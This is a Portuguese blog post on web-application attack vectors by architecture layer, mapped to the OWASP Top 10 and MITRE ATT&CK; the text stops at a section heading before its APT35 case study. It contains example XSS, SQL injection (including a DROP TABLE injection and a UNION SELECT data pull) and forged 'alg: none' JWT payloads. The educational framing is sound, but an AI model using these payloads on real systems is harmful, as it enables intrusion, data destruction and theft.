<!DOCTYPE html>
<html lang="en-gb"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Análise de Vetores de Ataque em Aplicações Web  | Obtuosa</title>
<meta property="og:title" content="Análise de Vetores de Ataque em Aplicações Web  | Obtuosa" />
<meta name="twitter:title" content="Análise de Vetores de Ataque em Aplicações Web  | Obtuosa" />
<meta itemprop="name" content="Análise de Vetores de Ataque em Aplicações Web  | Obtuosa" />
<meta name="application-name" content="Análise de Vetores de Ataque em Aplicações Web  | Obtuosa" />
<meta property="og:site_name" content="Obtuosa" />

<meta name="description" content="Uma análise de vetores de Ataque em arquitetura de aplicações web">
<meta itemprop="description" content="Uma análise de vetores de Ataque em arquitetura de aplicações web" />
<meta property="og:description" content="Uma análise de vetores de Ataque em arquitetura de aplicações web" />
<meta name="twitter:description" content="Uma análise de vetores de Ataque em arquitetura de aplicações web" />

<meta property="og:locale" content="en-gb" />
<meta name="language" content="en-gb" />

  <link rel="alternate" hreflang="en-gb" href="https://obtuosa.github.io/posts/arquitetura/" title="English" />


<meta itemprop="image" content="https://obtuosa.github.io/images/www.png" />
<meta property="og:image" content="https://obtuosa.github.io/images/www.png" />
<meta name="twitter:image" content="https://obtuosa.github.io/images/www.png" />
<meta name="twitter:image:src" content="https://obtuosa.github.io/images/www.png" />


    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2025-11-21T00:00:00Z />
    <meta property="article:published_time" content=2025-11-21T00:00:00Z />
    <meta property="og:url" content="https://obtuosa.github.io/posts/arquitetura/" />

    
    <meta property="og:article:author" content="" />
    <meta property="article:author" content="" />
    <meta name="author" content="" />
    
    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Análise de Vetores de Ataque em Aplicações Web ",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2025-11-21",
        "description": "Uma análise de vetores de Ataque em arquitetura de aplicações web",
        "wordCount":  3732 ,
        "mainEntityOfPage": "True",
        "dateModified": "2025-11-21",
        "image": {
        "@type": "imageObject",
        "url": "https:\/\/obtuosa.github.io\/images\/www.png"
        },
        "publisher": {
        "@type": "Organization",
        "name": "Obtuosa"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.131.0">

    
    <meta property="og:url" content="https://obtuosa.github.io/posts/arquitetura/">
  <meta property="og:site_name" content="Obtuosa">
  <meta property="og:title" content="Análise de Vetores de Ataque em Aplicações Web ">
  <meta property="og:description" content="Uma análise de vetores de Ataque em arquitetura de aplicações web">
  <meta property="og:locale" content="en_gb">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:published_time" content="2025-11-21T00:00:00+00:00">
    <meta property="article:modified_time" content="2025-11-21T00:00:00+00:00">
    <meta property="article:tag" content="Owasp">
    <meta property="article:tag" content="Mitre">
    <meta property="article:tag" content="Web">


    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Análise de Vetores de Ataque em Aplicações Web ">
  <meta name="twitter:description" content="Uma análise de vetores de Ataque em arquitetura de aplicações web">

    

    

    <link rel="canonical" href="https://obtuosa.github.io/posts/arquitetura/">
    <link href="/style.min.2d921c18cf1ec555ffc03d59a8adc211c402c68c930c27d6a0c306ab175a8d09.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://obtuosa.github.io/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
  


    

</head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://obtuosa.github.io/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>
    
        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Início
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/pages/about/">
                        Whoami
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Análise de Vetores de Ataque em Aplicações Web </h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2025-11-21T00:00:00&#43;00:00" itemprop="datePublished"> 21 Nov 2025 </time>
                </div>
                
            </header>
            
            <div class="page-content">
                <p><img alt="WWW" src="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/89c92vzuxd4jon4dfn0z.png"></p>
<h2 id="resumo">Resumo</h2>
<p>Este texto tem como proposta uma análise  aprofundada sobre a segurança de aplicações web, mas de uma perspectiva ofensiva. Através da <strong>arquitetura de três camadas</strong> (Apresentação, Aplicação e Dados), comumente conhecido como <strong>Three Tier Architecture</strong>, detalhando vetores de ataques específicos para cada camada com exemplos de código práticos. Além disso, também fornecer uma investigação de táticas, técnicas e procedimentos (TTPs) de grupos de Ameaça Persistente Avançada (APT), como o <strong>APT35</strong>, esmiuçando tecnicamente um de seus ataques com exemplos de payloads e comandos. O texto também explora a importância da análise a partir do OWASP Top 10 que lista os dez riscos de segurança mais críticos e comuns em aplicações web. O objetivo é permitir uma visão técnica e estruturada, para aspirantes, entusiastas, profissionais e pesquisadores da área de segurança da informação interessados em vulnerabilidades em aplicações web e em um ciclo de ataque de um APT.</p>
<h2 id="1-introdução">1. Introdução</h2>
<p>A grande crescente de dependência de aplicações web para serviços críticos, tendo em vista que hoje tudo pode ser feito através do navegador tornou a segurança dessas aplicações um pilar fundamental da cibersegurança. Atacantes, desde indivíduos até mesmo grupos de Ameaça Persistente Avançada (APT), <strong>patrocinados muitas vezes por estados</strong>, exploram vulnerabilidades em aplicações web para roubo de dados, espionagem, sabotagem, etc. <strong>Compreender a estrutura das aplicações web e como os(as) atacantes a manipulam é indispensável para a construção de defesas sólidas</strong>.</p>
<p>Este texto tenta aplicar uma visão ofensiva para dissecar a segurança de aplicações web. Deste modo, inicia-se com a análise da arquitetura de três camadas, um modelo predominante no mercado, e como cada camada pode apresentar uma superfície de ataque única, com exemplos de código que ilustram os ataques. A referência dessa análise é o OWASP Top 10 e a partir dele, construir uma ponte entre as vulnerabilidades em uma visão teórica e os ataques do mundo real, examinando estudos de caso de grupos APT.</p>
<h2 id="2-arquitetura-de-três-camadas-e-vetores-de-ataque">2. Arquitetura de Três Camadas e Vetores de Ataque</h2>
<p><img alt="Três camadas" src="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k3t3tq18ukef0ohirrq3.png"></p>
<p>A arquitetura de três camadas é predominante para aplicações tradicionais de cliente-servidor e é dividida em três unidades lógicas: a camada de apresentação, camada de aplicação e camada de dados. Essa separação cria diferentes domínios de segurança.</p>
<h3 id="21-camada-de-apresentação-presentation-layer">2.1. Camada de Apresentação (Presentation Layer)</h3>
<p>É a interface com o usuário no navegador, além de ser a camada de comunicação da aplicação no qual o usuário final interage. A princípio, seu objetivo é de exibir e coletar informações do usuário. Do ponto de vista de um invasor, esta camada é um alvo principal para ataques que  focam o usuário.</p>
<h3 id="211-cross-site-scripting">2.1.1. Cross-Site Scripting</h3>
<p>Cross-Site Scripting (XSS) é uma falha no sistema que possibilita o/a atacante injetar códigos maliciosos em páginas web. O OWASP classifica o XSS como uma forma de Injeção (A05:2025) e dialoga também com Configuração incorreta de segurança (A02:2025).</p>
<p>Hodiernamente, WAFs (Firewalls de Aplicações Web) e frameworks modernos (React, Angular, Django, etc.) já possuem mecanismos que bloqueiam XSS tradicionais (como o clássico <code>&lt;script&gt;alert(1)&lt;/script&gt;</code>). Logo, os ataques também mudaram de lugar, muitos agora exploram contextos específicos, validação incompleta de entrada e renderização dinâmica no cliente (DOM XSS).</p>
<p>Imagine uma rede social onde os usuários podem editar a sua biografia, algo bastante comum em diversos ambientes online, como o X/Twitter, Facebook e Instagram. Neste ponto, é possível inserir um texto formatado, seja em negrito, com links, emojis, etc.</p>
<p>A partir dessa contextualização, em um cenário de rede social que usa um editor de texto, por exemplo, e salva o conteúdo HTML diretamente no banco de dados, quando esse perfil é renderizado, o HTML vem direto da base e é inserido na página, com algo assim:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;div <span class="nv">class</span><span class="o">=</span><span class="s2">&#34;bio&#34;</span>&gt;
</span></span><span class="line"><span class="cl">  &lt;p&gt;Olá, me chamo Pedroca e quero fazer novas amizades😎&lt;/p&gt;
</span></span><span class="line"><span class="cl">&lt;/div&gt;
</span></span></code></pre></div><p>Só que nesse processo de inspecionar o HTML e observar como o sistema lida com esse conteúdo após recebe-lo, principalmente sobre como o valor do campo é armazenado e renderizado depois no site,  o/a atacante percebe que o campo aceita algumas tags HTML. Ele/Ela tenta inserir um conteúdo aparentemente inofensivo, mas com comportamento malicioso.</p>
<p>O/A invasor(a) insere na biografia:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;p&gt;Olá, me chamo Pedroca e quero fazer novas amizades😎&lt;/p&gt;
</span></span><span class="line"><span class="cl">&lt;img <span class="nv">src</span><span class="o">=</span><span class="s2">&#34;https://pedrocanews.com/imagem.png&#34;</span> <span class="nv">onmouseover</span><span class="o">=</span><span class="s2">&#34;alert(&#39;XSS by Pedroca&#39;)&#34;</span> /&gt;
</span></span></code></pre></div><p>E nesse contexto, nem sempre as WAFs conseguem ser acionadas, porque não usa a tag <code>&lt;script&gt;</code> diretamente, além de parecer legítimo, porque <img> é uma tag comum e a execução acaba dependendo de um evento do DOM (Modelo de Objeto de Documento) e quando outro usuário passa o mouse sobre a imagem, o Javascript é executado, com isso ocorre uma execução arbitrária dentro do domínio do site.</p>
<h3 id="22-camada-de-aplicação">2.2. Camada de Aplicação</h3>
<p>A camada de aplicação é basicamente a parte central, pois processa a lógica de negócios. É talvez o alvo mais almejado e rico para intrusos(as) que buscam comprometer a funcionalidade principal, além de também incluir, excluir ou modificar informações da camada de dados.</p>
<h3 id="221-injeção-de-sql-sqli">2.2.1. Injeção de SQL (SQLi)</h3>
<p>A injeção de SQL ocorre quando um adversário insere uma consulta SQL maliciosa. É uma das vulnerabilidades mais perigosas, categorizada como Quebra de controle de acesso (A01:2025),  Configuração incorreta de segurança (A02:2025) e Injeção (A05:2025) pelo OWASP, no entanto, muitas aplicações não montam mais queries SQL “na mão”. Hoje, usam <strong>ORMS</strong> (Object-Relational Mappers) que criam uma ponte entre o banco de dados e uma aplicação orientada a objetos. Por consequência, o SQLi não é mais só concatenar string, porque por padrão, usam consultas parametrizadas (prepared statements), que separam os dados da lógica da consulta, tornando a injeção mais “tradicional” quase impossível.</p>
<p>Em um cenário prático, onde supostamente uma API de busca está vulnerável, a mesma aceita parâmetros de entrada do usuário e os passa diretamente para um ORM sem qualquer validação adequada permitindo que os invasores manipulem consultas ao banco de dados. Portanto, ocorre uma injeção via ORM.</p>
<p>O Back end expõe o endpoint:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /api/users?sort_by<span class="o">=</span>name<span class="p">&amp;</span><span class="nv">order</span><span class="o">=</span>asc
</span></span></code></pre></div><p>O desenvolvedor escreve o código, que está em Node.js com Sequelize:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">const <span class="nv">sortBy</span> <span class="o">=</span> req.query.sort_by<span class="p">;</span> 
</span></span><span class="line"><span class="cl">const <span class="nv">order</span> <span class="o">=</span> req.query.order<span class="p">;</span>   
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">User.findAll<span class="o">({</span>
</span></span><span class="line"><span class="cl">  order: <span class="o">[[</span>sortBy, order<span class="o">]]</span>
</span></span><span class="line"><span class="cl"><span class="o">})</span><span class="p">;</span>
</span></span></code></pre></div><p>Em uma primeira análise, aparenta ser seguro, tendo em vista que o ORM “escapa” parâmetros. mas o problema é que não escapa identificadores (colunas), e como o <code>sortBy</code> vai direto para query, o intruso controla parte da estrutura SQL e então o atacante envia:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /api/users?sort_by<span class="o">=</span>name<span class="o">)</span><span class="p">;</span>DROP TABLE users<span class="p">;</span>--
</span></span></code></pre></div><p>A query interna se transforma em algo parecido com:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">SELECT * FROM users ORDER BY name<span class="o">)</span><span class="p">;</span>DROP TABLE users<span class="p">;</span>--
</span></span></code></pre></div><p>Ou seja, se o ORM não sanitiza adequadamente os nomes de coluna, essa instrução extra pode ser interpretada, e mesmo com WAFs, esse tipo de ataque pode acabar passando, pois o payload não contém palavras-chave simples como <code>‘ OR 1=1;</code> , além de ser possível também ofuscar essas requisições.</p>
<h3 id="222-quebra-de-autenticação">2.2.2. Quebra de Autenticação</h3>
<p>Quebra de autenticação são falhas que permitem a atacantes comprometerem contas de usuários e interage com Quebra de controle de acesso (A01:2025), Configuração incorreta de segurança (A02:2025) e Falhas de autenticação (A07:2025) do OWASP Top 10.</p>
<p>Outro ponto importante é que se utiliza muito os tokens para autenticação via API, no lugar de cookies e sessões, como por exemplo o <strong>JWT</strong> (JSON Web Token) e apesar do uso de tokens, algumas novas formas de falhas surgiram em virtude do mau uso deles.</p>
<p>Imagine uma aplicação que gera tokens JWT mal configurados:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">const <span class="nv">jwt</span> <span class="o">=</span> require<span class="o">(</span><span class="s1">&#39;jsonwebtoken&#39;</span><span class="o">)</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">const <span class="nv">token</span> <span class="o">=</span> jwt.sign<span class="o">({</span> user: username, role: <span class="s1">&#39;user&#39;</span> <span class="o">}</span>, <span class="s1">&#39;chave-secreta&#39;</span><span class="o">)</span><span class="p">;</span>
</span></span></code></pre></div><p>e valida dessa forma:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">jwt.verify<span class="o">(</span>token, <span class="s1">&#39;chave-secreta&#39;</span><span class="o">)</span><span class="p">;</span>
</span></span></code></pre></div><p>Neste ponto, o Back end acaba aceitando tokens sem checar o algoritmo usado e em uma exploração, onde um invasor cria um token com o algoritmo “none”, acaba forçando o servidor a não verificar assinatura:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">{</span>
</span></span><span class="line"><span class="cl">  <span class="s2">&#34;alg&#34;</span>: <span class="s2">&#34;none&#34;</span>,
</span></span><span class="line"><span class="cl">  <span class="s2">&#34;typ&#34;</span>: <span class="s2">&#34;JWT&#34;</span>
</span></span><span class="line"><span class="cl"><span class="o">}</span>
</span></span></code></pre></div><p>Payload:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">{</span>
</span></span><span class="line"><span class="cl">  <span class="s2">&#34;user&#34;</span>: <span class="s2">&#34;pedroca&#34;</span>,
</span></span><span class="line"><span class="cl">  <span class="s2">&#34;role&#34;</span>: <span class="s2">&#34;admin&#34;</span>
</span></span><span class="line"><span class="cl"><span class="o">}</span>
</span></span></code></pre></div><p>Como resultado, o back end confia no token mascarado, concedendo acesso administrativo. Apesar da falha “alg: none” ser antiga, alguns sistemas ainda são vulneráveis, principalmente por usar serviços intermediários (API Gateways, proxies) que só verificam formato e não a assinatura.</p>
<h3 id="23-camada-de-dados-data-layer">2.3. Camada de Dados (Data Layer)</h3>
<p>A camada de dados é a camada na qual as informações processadas pela aplicação são armazenadas e gerenciadas.  A aplicação basicamente persiste, busca e processa as informações cŕiticas. Quando por exemplo, a camada de aplicação é vulnerável a Injeção SQL, um atacante pode acabar usando dessa falha para exfiltrar dados diretamente do banco.</p>
<h3 id="231-exfiltração-de-dados-via-sqli">2.3.1 Exfiltração de Dados via SQLi</h3>
<p>Exfiltração de dados via SQLi  é quando um atacante pode usar da vulnerabilidade de injeção SQL para retirar dados diretamente do banco de dados. Pode ser categorizada nas mesmas dinâmicas da Injeção de SQL quanto ao OWASP, já que nasce a partir dela.</p>
<p>Em uma aplicação de e-commerce com um determinado endpoint de busca:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /api/products?category<span class="o">=</span>iphone
</span></span></code></pre></div><p>O back end executa uma query dessa forma:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="p">,</span><span class="w"> </span><span class="n">price</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">products</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">category</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;iphone&#39;</span><span class="p">;</span><span class="w">
</span></span></span></code></pre></div><p>A pessoa que está desenvolvendo confia plenamente no parâmetro <code>category</code> e apenas insere ele na query, mas um atacante consegue perceber isso e começa a explorar, ainda que tenha que passar pelos WAFs e logs que filtram strings simples como <code>‘ OR 1=1</code>  ou <code>UNION SELECT</code> .</p>
<p>O atacante insere a clássica aspas simples:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="o">/</span><span class="n">api</span><span class="o">/</span><span class="n">products</span><span class="o">?</span><span class="n">category</span><span class="o">=</span><span class="n">iphone</span><span class="s1">&#39;
</span></span></span></code></pre></div><p>O back end acaba retornando erro de SQL e cria brechas para a exploração. Uma das diversas técnicas é a injeção UNION-Based.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="s1">&#39; UNION SELECT username, email FROM users--
</span></span></span></code></pre></div><p>Essa query faz com que o sistema combine os resultados da tabela users com os da tabela products. O servidor caso seja possível burlar as camadas de segurança retorna algo como:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="p">[</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">  </span><span class="err">{</span><span class="s2">&#34;name&#34;</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;pedroca&#34;</span><span class="p">,</span><span class="w"> </span><span class="s2">&#34;price&#34;</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;pedroca@example.com&#34;</span><span class="err">}</span><span class="p">,</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">  </span><span class="err">{</span><span class="s2">&#34;name&#34;</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;admin&#34;</span><span class="p">,</span><span class="w"> </span><span class="s2">&#34;price&#34;</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;admin@example.com&#34;</span><span class="err">}</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="p">]</span><span class="w">
</span></span></span></code></pre></div><p>Esse tipo de ataque funciona porque o banco de dados acaba sendo compartilhado entre diferentes áreas da aplicação, e a query é montada de forma concatenada, sem uso de parâmetros. Hoje WAFs detectam <code>UNION SELECT</code> literal, então os invasores tentam disfarçar a consulta de alguma forma, seja com encoding, comentários in-line, etc.</p>
<h2 id="3-ameaças-persistente-avançadas-apts">3. Ameaças Persistente Avançadas (APTs)</h2>
<p>Uma <strong>Ameaça Persistente Avançada (APT)</strong> é um tipo de ataque cibernético mais sofisticado e longo, no qual um agente de ameaça, geralmente um <strong>estado-nação</strong> ou um grupo que seja patrocinado por ele, realiza ataques que obtém acesso não autorizado, sendo as aplicações web vetores de entrada bastante comuns e permanecem indetectado por um longo período. O objetivo principal dessas ações, é justamente roubo de dados sensíveis, espionagem, sabotagem de sistemas, etc.</p>
<p>O termo “APT” é definido através de três características fundamentais:</p>
<ol>
<li><strong>Avançada (Advanced)</strong>: Os invasores utilizam de um leque completo de ferramentas e técnicas, que podem incluir desde exploração de vulnerabilidades <strong>zero day</strong>, <strong>engenharia social</strong> muito bem direcionada ****e <strong>malwares</strong> bem objetivos.</li>
<li><strong>Persistente (Persistent)</strong>: Neste ponto o invasor consegue manter um <strong>canal de comando e controle</strong> (Command and Control - C2) contínuo com um dos ou o sistema comprometido, garantindo o acesso, mesmo depois de uma possível detecção e remoção, por exemplo de um malware. É possível também muitas vezes, a depender do escopo dos objetivos traçados, que acabe retornando novamente ao sistema.</li>
<li><strong>Ameaça (Threat)</strong>: Esse ataque é orquestrado por grupos de agente de ameaça, organizado e motivado, com recursos significativos e objetivos muito bem definidos, como governos, grandes corporações ou infraestruturas críticas.</li>
</ol>
<h3 id="31-grupos-de-apt-e-suas-táticas">3.1. Grupos de APT e suas táticas</h3>
<p>Os Grupos de APT são categorizados por agências de inteligência e empresas de segurança cibernética, muitas vezes recebem nomes a partir de taxonomia e identificadores alfanuméricos, como no caso do framework <strong>MITRE ATT&amp;CK</strong>, que é uma referência essencial para compreender as táticas e técnicas usadas por esses grupos.</p>
<h3 id="311-táticas-técnicas-e-procedimentos-ttps-de-apts">3.1.1 Táticas, Técnicas e Procedimentos (TTPs) de APTs</h3>
<p>As <strong>Táticas, Técnicas e Procedimentos (TTPs)</strong> representam ****a forma de agir de um APT, detalhando desde o “por quê”, “como” e o “o quê” de suas ações O ciclo de vida de um ataque APT é normalmente dividido em fases, e o framework <strong>MITRE ATT&amp;CK</strong> fornece a taxonomia mais aceita atualmente para descrever as TTPs em cada fase.</p>
<h3 id="312-o-ciclo-de-vida-do-ataque-e-o-mitre-attck">3.1.2. O Ciclo de Vida do Ataque e o MITRE ATT&amp;CK</h3>
<p>O ciclo de vida de um ataque APT é um processo multifacetado e contínuo, que se relaciona diretamente com as <strong>Táticas</strong> do MITRE ATT&amp;CK. As táticas representam o objetivo tático do adversário/a em cada estágio do ataque.</p>
<p><img alt="Matriz" src="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/77smrisay8zm1fhfztah.png"></p>
<ol>
<li><strong>Reconhecimento - Reconnaissance (TA0043)</strong>: O invasor reúne informações que podem ser usadas para planejar operações futuras, coletando ativa ou passivamente informações que podem ser usadas para apoiar a definição de alvos.</li>
<li><strong>Desenvolvimento de Recursos - Resource Development (TA0042)</strong>: O invasor tenta estabelecer recursos que podem ser usados para apoiar as operações, seja criando, comprando ou comprometendo/roubando recursos que podem ser usados para apoiar o direcionamento. Esses recursos incluem infraestrutura , contas ou recursos.</li>
<li><strong>Acesso Inicial - Initial Access (TA0001)</strong>: Consiste em técnicas que utilizam vários vetores de entrada para obter um acesso inicial dentro de uma rede.</li>
<li><strong>Evasão de Defesa - Defense Evasion (TA0005)</strong>: Os atacantes usam técnicas para evitar a detecção durante todo o processo de comprometimento.</li>
<li><strong>Descoberta - Discovery (TA0007)</strong> - O atacante tenta obter o máximo de conhecimento possível sobre o sistema e a rede interna.</li>
<li><strong>Execução - Execution (TA0002)</strong>: Consiste em técnicas que resultam na execução de código controlado pelo adversário em um sistema local ou remoto.</li>
<li><strong>Escalação de Privilégios - Privilege Escalation (TA0004)</strong>: As técnicas consistem em tentar obter permissões maiores em um sistema ou rede, como um root por exemplo.</li>
<li><strong>Persistência - Persistence (TA0003)</strong>: Os adversários utilizam técnicas para manter o acesso aos sistemas após reinicializações, alterações de credenciais e outras formas de interrupções que poderiam cortar o seu acesso.</li>
<li><strong>Movimento Lateral - Lateral Movement (TA0008)</strong>: O adversário tenta ampliar seu campo de ataque e atingir mais sistemas em uma rede.</li>
<li><strong>Comando e controle - Command and Control C2 (TA0011)</strong>:  O atacante tenta se comunicar com sistemas comprometidos para controlá-los.</li>
<li><strong>Exfiltração - Exfiltration (TA0010)</strong>: Os adversários se utilizam de técnicas para roubar dados da rede invadida.</li>
<li><strong>Impacto - Impact (TA0040)</strong>: O adversário tenta manipular, interromper ou destruir os sistemas e dados de um alvo. O impacto consiste em utilizar técnicas que possam interromper a disponibilidade ou comprometer a integridade, manipulando processos comerciais e operacionais.</li>
</ol>
<h3 id="313-técnicas-e-procedimentos">3.1.3. Técnicas e Procedimentos</h3>
<p>As <strong>Técnicas</strong> no MITRE ATT&amp;CK descrevem “como” o adversário atinge um objetivo tático ( o “ por que”).</p>
<p>Os <strong>Procedimentos</strong> são a forma como um grupo APT aplica uma técnica**.** Por exemplo, o grupo <strong>APT35</strong>  implementa a técnica <strong>Explorar aplicativos voltados para o público - Exploit Public-Facing Application (T1190)</strong> utilizando de forma específica a exploração da vulnerabilidade CVE 2021-44228 <strong>(Log4Shell)</strong> em  aplicações web que usam Java.</p>
<p>A sofisticação de um APT reside em sua capacidade de encadear diversas técnicas (Ts) e procedimentos (Ps) de forma bem coordenada e adaptativa, assim garante que o ataque persista e atinja o objetivo final, que é a <strong>Exfiltração</strong> ou <strong>Impacto</strong> (como sabotagem).</p>
<h3 id="32-aplicações-web-como-vetor-de-entrada-comum">3.2. Aplicações Web como Vetor de Entrada Comum</h3>
